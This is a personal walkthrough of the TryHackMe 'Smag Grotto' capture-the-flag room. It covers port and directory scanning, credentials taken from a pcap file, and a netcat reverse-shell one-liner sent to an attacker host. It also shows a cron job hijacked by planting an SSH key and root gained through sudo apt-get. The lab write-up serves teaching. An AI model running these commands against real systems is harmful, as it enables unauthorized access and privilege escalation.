TryHackMe - Smag Grotto - writeup

Smag Grotto is one of the easy CTF rooms on the TryHackMe.com. Here are my steps that lead me to the successful solution and finding both user and root flag. Before you start you need to boot up the VM and attackbox machine.

1. step
First I have run nmap scan:

nmap -sC VM_IP

Scan gives me that only 2 ports are open - ssh and http. Connection to the page ip, didnt give me much more info.
2. step
I then tried researching the VM with gobuster:

gobuster dir -t 40 -u VM_IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt

With gobuster I find /mail folder.
3. step
Then I opened /mail folder where we find the email correspondence with .pcap trace file.
4. step
I have downloaded the pcap file and open it with wireshark.In the trace file I have found the new domain where site is located. I also found the username and password for login.
5. step
To access new domain I have added VM_IP and new domain I have found in .pcap file to the /etc/hosts file on attackbox machine.
6. step
Now I have entered domain to the web browser and found login.php script and enter credentials from .pcap file.
7. step
After the login you are at site where you can enter commands. I had to look around the internet to get hint what to do in this step. In this step we initiate the reverse shell and start nc listener on attack box. I have run:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc Attackbox_IP 1338 >/tmp/f

On the attackbox I have started nc listener:

nc -lvnp 1338

8. step
In a second I got shell access as www-data. After that I have checked cronjob settings and see that there is copy of the /opt/.backups/jake_ir_rsa.pub.backup public key to the authorised keys. Hmmm I think we could exploit this one by putting our public key instead of legit key.
9. step
On attackbox machine we can create our public key with following command:

ssh-keygen -t rsa -P '' -f jakekey

then we open key file and copy to the target machine with :

echo "public_key_we_created" > jake_id_rsa.pub.backup

Note that you need to create file in /opt/.backups/ folder and filename needs to be as stated above that cronjob will take our file and we can login to the machine.
10. step
Ok in this step I tried to log in to the machine using key. But of course I bit forgot how to do it so I had to look for little help what is exact command to use ssh keys to connect to the machine.

ssh -i jakekey jake@devleopment.smag.thm

then I pressed enter and I was logged in as jake. We can now search for the user flag.

find / -type f -name user.txt 2>/dev/null

11. step
Then I can open user.txt file and copy the flag.
12. step
Now I was missing only root flag and I could access file only as root. I checked what programs I could run as jake user:

sudo -l

Output of the command showed us that apt-get command can be run as jake user.
13. step
To do so we head over to the GTFObins and we find the command that we can run as current user to get root access.


14. step
We can find root flag at:

cat /root/root.txt

I hope anyone who gets stuck finds it helpful
AudiTTRSi